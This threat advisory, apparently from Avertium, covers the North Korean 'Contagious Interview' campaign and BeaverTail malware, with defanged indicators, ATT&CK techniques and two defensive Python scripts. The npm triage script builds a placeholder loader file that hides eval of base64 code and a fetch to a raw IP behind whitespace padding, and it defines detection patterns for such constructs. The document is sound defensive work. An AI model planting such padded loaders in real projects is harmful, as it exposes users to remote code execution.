overview
A new wave of attacks originating from North Korea has been targeting job seekers as part of what is likely a financially motivated campaign tracked as “Contagious Interview”. The name was coined by Palo Alto Networks Unit 42 in late 2023; the latest wave was discovered in mid-August by Group-IB, a Singapore-based security company.
The attack begins with ordinary recruiter correspondence and culminates in a fake interview designed to trick the job seeker into running BeaverTail, a malware family (JavaScript in most samples) that delivers a Python-based back-door with remote-control, keylogging and browser-data theft capability. After the job seeker makes initial contact, the threat actors move the conversation to Telegram, then direct the interviewee to download a video-conferencing application and, in some cases, a Node.js project in order to complete a technical task as part of the interview. Running either one installs the malware on the victim's own system.
The campaign is attributed to the Lazarus Group (also tracked as Hidden Cobra, Diamond Sleet, APT38, Zinc, Guardians of Peace, Group 77, Who Is Hacking Team, Stardust Chollima and Nickel Academy). Beyond general information theft, BeaverTail has been specifically modified to target cryptocurrency wallets and related browser extensions so that funds can be stolen directly from victims.
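A practical check a job seeker or security team can run before executing an interview “coding task” repository, added here as an example (it is not Avertium's tooling and not a signature for BeaverTail): list the npm lifecycle hooks that run automatically during `npm install`, and scan the project for constructs that loaders commonly use to fetch or decode a second stage. The sample project it audits is constructed inline; the postinstall hook, the base64 string (which decodes to a harmless `console.log`) and the 203.0.113.10 address (a documentation range) are all placeholders.

```python
"""Triage an untrusted Node.js project before running it.

Added example: generic heuristics for 'coding test' repositories, not a
signature for BeaverTail or any other specific family.
"""
import json
import re
import tempfile
from pathlib import Path

# npm runs these automatically during `npm install` unless --ignore-scripts is set.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Constructs loaders use to hide or fetch a second stage. Any one alone is not
# proof of malice; several of them in a small take-home task deserve a look.
SUSPICIOUS_PATTERNS = {
    "eval_or_function_ctor": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "base64_decode": re.compile(r"Buffer\.from\s*\([^)]*['\"]base64['\"]\s*\)|\batob\s*\("),
    "child_process": re.compile(r"require\s*\(\s*['\"]child_process['\"]\s*\)"),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),
    "hex_escape_run": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
}
SOURCE_SUFFIXES = {".js", ".cjs", ".mjs", ".ts", ".json"}
LONG_LINE = 500  # one very long line in hand-written code often hides padded/obfuscated code


def audit_project(root: Path) -> list[dict]:
    """Return one finding per (file, rule): lifecycle hooks plus pattern hits."""
    findings = []
    pkg = root / "package.json"
    if pkg.is_file():
        scripts = json.loads(pkg.read_text(encoding="utf-8")).get("scripts", {})
        for hook in LIFECYCLE_HOOKS:
            if hook in scripts:
                findings.append({"file": "package.json", "rule": f"lifecycle:{hook}", "detail": scripts[hook]})

    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix not in SOURCE_SUFFIXES or "node_modules" in path.parts:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        rel = path.relative_to(root).as_posix()
        for rule, pattern in SUSPICIOUS_PATTERNS.items():
            match = pattern.search(text)
            if match:
                findings.append({"file": rel, "rule": rule, "detail": match.group(0)[:60]})
        for lineno, line in enumerate(text.splitlines(), 1):
            if len(line) > LONG_LINE:
                findings.append({"file": rel, "rule": "long_line", "detail": f"line {lineno}: {len(line)} chars"})
    return findings


def build_sample_project() -> Path:
    """Constructed sample (not real malware): a clean module plus a padded loader file."""
    root = Path(tempfile.mkdtemp(prefix="interview-task-"))
    (root / "package.json").write_text(json.dumps({
        "name": "interview-task",
        "version": "1.0.0",
        "scripts": {"test": "node test.js", "postinstall": "node lib/init.js"},
    }, indent=2), encoding="utf-8")
    (root / "src").mkdir()
    (root / "src" / "index.js").write_text("module.exports = (a, b) => a + b;\n", encoding="utf-8")
    (root / "lib").mkdir()
    # 'Y29uc29sZS5sb2coJ2hlbGxvJyk=' is base64 for console.log('hello');
    # 203.0.113.10 is from the TEST-NET-3 documentation range. Both are placeholders.
    padded = ("// helpers" + " " * 600 +
              'const { exec } = require("child_process"); '
              'eval(Buffer.from("Y29uc29sZS5sb2coJ2hlbGxvJyk=", "base64").toString()); '
              'fetch("http://203.0.113.10/next");')
    (root / "lib" / "init.js").write_text("'use strict';\n" + padded + "\n", encoding="utf-8")
    return root


def triggered_rules(findings: list[dict]) -> set[str]:
    """Distinct rule names across a set of findings."""
    return {f["rule"] for f in findings}


if __name__ == "__main__":
    for f in audit_project(build_sample_project()):
        print(f"{f['file']:<18} {f['rule']:<22} {f['detail']}")
```

Point it at a real checkout with `audit_project(Path("repo"))`. When a project has to be installed anyway, `npm install --ignore-scripts` inside a disposable VM keeps the lifecycle hooks from running, and the long-line and decode-then-eval findings tell you which files to read before `node` ever touches them.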
how avertium is protecting our customers
IOCs ADDED TO OUR THREAT FEEDS
NOTE!: Avertium is actively searching across all monitored environments for the IoCs listed below. If any are discovered, we will reach out to you directly. If your environment or portions of your environment are not currently being monitored, please reach out to your Service Delivery Manager.
BeaverTail (SHA-256 file hashes, IPv4 addresses and a domain; network indicators are defanged)
- ff620bd560485c13a58a0de941bd3e52943036e6a05306e928f7c626998822fb
- fc9bb03998a89524ce5a0f859feb45806983aa4feb5f4d436107198ca869ff6f
- e2a940c7d19409e960427749519dc02293abe58a1bef78404a8390f818e40d08
- de42155e14a3c9c4d919316d6ba830229533de5063fcd110f53e2395ef3aa77a
- db6e75987cabdbfc21d0fdcb1cdae9887c492cab2b2ff1e529601a34a2abfd99
- da6d9c837c7c2531f0dbb7ce92bfceba4a9979953b6d49ed0862551d4b465adc
- d8f065d264b1112d6ee3cf34979289e89d9dcb30d2a3bd78cc797a81d3d56f56
- ceb59dbaf58a8de02f9d5e9b497321db0a19b7db4affd5b8d1a7e40d62775f96
- c8c11f9b308ea5983eebd8a414684021cc4cc1f67e7398ff967a18ae202fb457
- c5a73896dc628c23a0b6210f50019445e2b8bfc9770f4c81e1fed097f02dfade
- c547b80e1026d562ac851be007792ae98ddc1f3f8776741a72035aca3f18d277
- blocktestingto[.]com
- b833f40b2f3439f317cf95980b29bddd2245d2acc2d5c11e9690dd2fa4289585
- b5f151f0a4288e148fd10e19c78399f5b7bdff2ad66940fadd20d6eae4b7518b
- ab198c5a79cd9dedb271bd8a56ab568fbd91984f269f075d8b65173e749a8fde
- a2f8de3c5f5f6ecbf29c15afd43a7c13a5bf60023ecb371d39bcca6ceef1d2b7
- 9ae24a1912e4b0bab76ae97484b62ea22bdc27b7ea3e6472f18bf04ca66c87de
- 9867f99a66e64f6bce0cfca18b124194a683b8e4cb0ced44f7cb09386e1b528d
- 92aeea4c32013b935cd8550a082aff1014d0cd2c2b7d861b43a344de83b68129
- 845d7978682fa19161281a35b62f4c447c477082a765d6fedb219877d0c90f31
- 7f8bb754f84a06b3e3617dd1138f07a918d11717cc63acaef8eb5c6d10101377
- 7b718a46ae4de09ed4f2513df6e989afe1fbb1a0f59511a4689fac5e1745547d
- 785f65f1853a08b0e86db5638fbd76e8cad5fe1359655716166a76035261c0be
- 75f9f99295f86de85a8a2e4d73ed569bdb14a56a33d8240c72084f11752b207e
- 72ebfe69c69d2dd173bb92013ab44d895a3367f91f09e3f8d18acab44e37b26d
- 709820850127201a17caab273e01bb36ce185b4c4f68cd1099110bb193c84c42
- 700a582408cbda7ee79723b3969b8d10d67871ea31bb17c8ca3c0d94b481aa8c
- 6b3fce8f2dad7e803418edd8dfc807b0252705c11ec77114498b01766102e849
- 67[.]203[.]7[.]163
- 6465f7ddc9cf8ab6714cbbd49e1fd472e19818a0babbaf3764e96552e179c9af
- 61dff5cbad45b4fe0852ac95b96b62918742b9c90dd47c672cbe0d1dafccb6c5
- 617c62da1c228ec6d264f89e375e9a594a72a714a9701ed3268aa4742925112b
- 592769457001374fac7a44379282ddf28c2219020c88150e32853f7517896c34
- 4f50051ae3cb57f10506c6d69d7c9739c90ef21bfb82b14da6f4b407b6febac0
- 4c605c6ef280b4ed5657fe97ba5b6106b10c4de02a40ae8c8907683129156efd
- 4c465e6c8f43f7d13a1b887ff26d9a30f77cf65dd3b6f2e9f7fe36c8b6e83003
- 444f56157dfcf9fc2347911a00fe9f3e3cb7971dccf67e1359d2f99a35aed88e
- 41a912d72ba9d5db95094be333f79b60cae943a2bd113e20cc171f86ebcb86cf
- 40645f9052e03fed3a33a7e0f58bc2c263eeae02cbc855b9308511f5dc134797
- 39e7f94684129efce4d070d89e27508709f95fa55d9721f7b5d52f8b66b95ceb
- 35434e903bc3be183fa07b9e99d49c0b0b3d8cf6cbd383518e9a9d753d25b672
- 305de20b24e2662d47f06f16a5998ef933a5f8e92f9ecadf82129b484769bbac
- 2d8a5b637a95de3b709780898b7c3957f93d72806e87302f50c40fe850471a44
- 2d300410a3edb77b5f1f0ff2aa2d378425d984f15028c35dfad20fc750a6671a
- 276863ee7b250419411b39c8539c31857752e54b53b072dffd0d3669f2914216
- 2618a067e976f35f65aee95fecc9a8f52abea2fffd01e001f9865850435694cf
- 1f9169492d18bffacebe951a22495d5dec81f35b0929da7783b5f094efef7b48
- 1c905fa3a108f4c9bc0578882ce7af9682760b80af5232f130aa4f6463156b25
- 1b21556fc8ecb9f8169ba0482de857b1f8a5cb120b2f1ac7729febe76f1eea83
- 147[.]124[.]214[.]237
- 147[.]124[.]214[.]131
- 147[.]124[.]214[.]129
- 12c0f44a931b9d0d74a2892565363bedfa13bec8e48ff5cd2352dec968f407ee
- 121ca625f582add0527f888bb84b31920183e78c7476228091ff2199ec5d796b
- 1123fea9d3a52989ec34041f791045c216d19db69d71e62aa6b24a22d3278ef9
- 104926c2c937b4597ea3493bccb7683ae812ef3c62c93a8fb008cfd64e05df59
- 0ce264819c7af1c485878ce795fd4727952157af7ffdea5f78bfd5b9d7806db1
- 09a508e99b905330a3ebb7682c0dd5712e8eaa01a154b45a861ca12b6af29f86
- 03185038cad7126663550d2290a14a166494fdd7ab0978b98667d64bda6e27cc
Contagious Interview (delivery infrastructure; defanged)
- https://cloudov-interview-series-projects[.]vercel[.]app/Osobn%c3%ad[.]html
- interview[.]serveftp[.]com
- interviewportal[.]ddns[.]net
- recruitment-interview[.]org
- https://interview[.]az/at-corrupti/documents[.]zip
- http://interviewsetup[.]com/rag[.]php
- cloudov-interview-series-projects[.]vercel[.]app
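The indicators above are defanged (`[.]` for `.`) and mix SHA-256 hashes, IPv4 addresses, domains and URLs in one list. The following added example (not Avertium's or Group-IB's tooling) refangs and classifies them, indexes each URL's host as a domain indicator too, and matches them against log lines using token boundaries, so 147.124.214.13 is not mistaken for 147.124.214.131 while a subdomain of a listed host still triggers. The indicator subset is copied from the list above; the log lines are constructed.

```python
"""Match the advisory's defanged indicators against log lines (added example)."""
import ipaddress
import re
from collections import defaultdict

# Subset of the indicators listed above, copied in their defanged form.
ADVISORY_IOCS = [
    "ff620bd560485c13a58a0de941bd3e52943036e6a05306e928f7c626998822fb",
    "blocktestingto[.]com",
    "67[.]203[.]7[.]163",
    "147[.]124[.]214[.]237",
    "interview[.]serveftp[.]com",
    "https://interview[.]az/at-corrupti/documents[.]zip",
    "http://interviewsetup[.]com/rag[.]php",
]

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
URL_RE = re.compile(r"^https?://([^/\s]+)(/\S*)?$")
# Token extractors for free-text log lines; the boundaries stop 147.124.214.13
# from matching 147.124.214.131 and a 64-hex run inside a longer blob from matching.
SHA256_TOKEN_RE = re.compile(r"(?<![0-9a-f])[0-9a-f]{64}(?![0-9a-f])")
IPV4_TOKEN_RE = re.compile(r"(?<![\d.])\d{1,3}(?:\.\d{1,3}){3}(?![\d.])")
HOST_TOKEN_RE = re.compile(r"(?<![\w.-])(?:[a-z0-9-]+\.)+[a-z]{2,}(?![\w-])")


def refang(value: str) -> str:
    """Undo the usual defanging ('[.]', 'hxxp') and normalise case."""
    return value.strip().replace("[.]", ".").replace("hxxp", "http").lower()


def classify(ioc: str) -> tuple[str, str]:
    """Return (kind, refanged value); kind is sha256, url, ipv4 or domain."""
    value = refang(ioc)
    if SHA256_RE.match(value):
        return "sha256", value
    if URL_RE.match(value):
        return "url", value
    try:
        ipaddress.IPv4Address(value)
        return "ipv4", value
    except ipaddress.AddressValueError:
        return "domain", value


def build_index(iocs) -> dict[str, set[str]]:
    """Group indicators by kind; a URL indicator also contributes its host."""
    index = defaultdict(set)
    for ioc in iocs:
        kind, value = classify(ioc)
        index[kind].add(value)
        if kind == "url":
            # The host alone is worth alerting on in DNS and proxy logs.
            index["domain"].add(URL_RE.match(value).group(1))
    return index


def scan_line(line: str, index) -> set[tuple[str, str]]:
    """All (kind, value) indicator hits in one log line."""
    text = line.lower()
    hits = set()
    hits.update(("sha256", h) for h in SHA256_TOKEN_RE.findall(text) if h in index["sha256"])
    hits.update(("ipv4", ip) for ip in IPV4_TOKEN_RE.findall(text) if ip in index["ipv4"])
    for host in HOST_TOKEN_RE.findall(text):
        # Exact match or any subdomain of a listed domain.
        if any(host == d or host.endswith("." + d) for d in index["domain"]):
            hits.add(("domain", host))
    hits.update(("url", u) for u in index["url"] if u in text)
    return hits


def scan_logs(lines, index) -> list[tuple[int, str, str]]:
    """Return (line_number, kind, value) for every hit; line numbers are 0-based."""
    return sorted((n, kind, value)
                  for n, line in enumerate(lines)
                  for kind, value in scan_line(line, index))


# Constructed sample records (DNS, proxy, EDR); only the indicator values are real.
SAMPLE_LOGS = [
    "2024-09-02T10:14:03Z dns client=10.0.4.21 query=blocktestingto.com type=A",
    "2024-09-02T10:14:09Z proxy src=10.0.4.21 dst=147.124.214.237 method=GET status=200",
    "2024-09-02T10:15:30Z edr host=ws-0421 event=file_create sha256=FF620BD560485C13A58A0DE941BD3E52943036E6A05306E928F7C626998822FB",
    "2024-09-02T10:16:02Z dns client=10.0.4.22 query=github.com type=A",
    "2024-09-02T10:16:44Z proxy src=10.0.4.23 dst=147.124.214.13 url=https://example.org/ status=200",
    "2024-09-02T10:17:10Z dns client=10.0.4.21 query=cdn.interview.serveftp.com type=A",
]

if __name__ == "__main__":
    for n, kind, value in scan_logs(SAMPLE_LOGS, build_index(ADVISORY_IOCS)):
        print(f"line {n}: {kind} {value}")
```

Feed `build_index` the full list above and `scan_logs` a file of exported DNS, proxy or EDR records; hashes are compared case-insensitively because EDR products disagree on case, and the near-miss address in the sample (147.124.214.13) is there to show that a plain substring search would have produced a false positive.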
TTPs TO MONITOR
- Initial Access (TA0001)
Social engineering techniques are often aimed at gaining an initial foothold into the target's environment. Some of the techniques within this tactic include:
- Phishing (T1566): Various forms of phishing (e.g., spear-phishing emails, links, attachments) are the primary social engineering vectors to gain access.
- Spearphishing Attachment (T1566.001): Sending a malicious attachment.
- Spearphishing Link (T1566.002): Sending a link to a malicious site or resource.
- Spearphishing via Service (T1566.003): Phishing through services such as social media or messaging platforms.
- Drive-by Compromise (T1189): The target's browser is compromised simply by visiting a malicious or compromised website, without any further action on their part.
- Trusted Relationship (T1199): Abusing the trust the target places in a third party, here by posing as a legitimate recruiter or prospective employer.
- Execution (TA0002)
After gaining access, social engineering can play a role in executing malicious payloads. Some techniques include:
- User Execution (T1204): This technique is used when the adversary tricks a user into executing malicious content.
- Malicious Link (T1204.001): The user clicks on a malicious link that leads to execution.
- Malicious File (T1204.002): The user opens or runs a file (here, a fake video-conferencing installer or a Node.js project supplied as an interview task), leading to malicious code execution.
- Command and Scripting Interpreter: JavaScript (T1059.007) and Python (T1059.006): The Node.js project executes under the JavaScript interpreter, and the second-stage back-door it delivers is written in Python.
ADDITIONAL SERVICE OFFERINGS
- Fusion MXDR is the first MDR offering that fuses together all aspects of security operations into a living, breathing, threat-resistant XDR solution. By fusing insights from threat intelligence, security assessments, and vulnerability management into our MDR approach, Fusion MXDR offers a more informed, robust, and cost-effective approach to cybersecurity, one that is greater than the sum of its parts.
- Security Information and Event Management (SIEM) - Minimizing the impact of a successful ransomware or malware attack requires detecting it as early in the attack as possible. A Security Information and Event Management (SIEM) system can help an organization to accomplish this. Avertium offers a comprehensive SIEM-based approach that increases the potential for detecting a ransomware infection before it deploys. SIEM provides a holistic overview of a company’s IT environment from a single point of view in terms of its specific security events, empowering teams to detect and analyze unusual behavior.
- Avertium aligns your Cybersecurity Strategy with your business strategy, ensuring that your investment in security is also an investment in your business. Our Cybersecurity Strategy service includes:
- Strategic Security Assessments - Strengthening your security posture begins with knowing where your current program stands (NIST CSF, Security Architecture, Business Impact Analysis, Sensitive Data Inventory, Network Virtualization and Cloud Assessment).
- Threat Mapping – Leverage Avertium’s Cyber Threat Intelligence, getting a more informed view of your most likely attack scenarios (Threat Assessment and MITRE ATT&CK).
- Cyber Maturity Roadmap - Embrace a comprehensive, quantifiable, and well-organized approach to establishing and continuously enhancing your cybersecurity resilience (Policy + Procedure Development, Virtual CISO (VCISO), Training + Enablement, Tabletop Exercises, and Business Continuity + Disaster Recovery Plan).
SUPPORTING DOCUMENTATION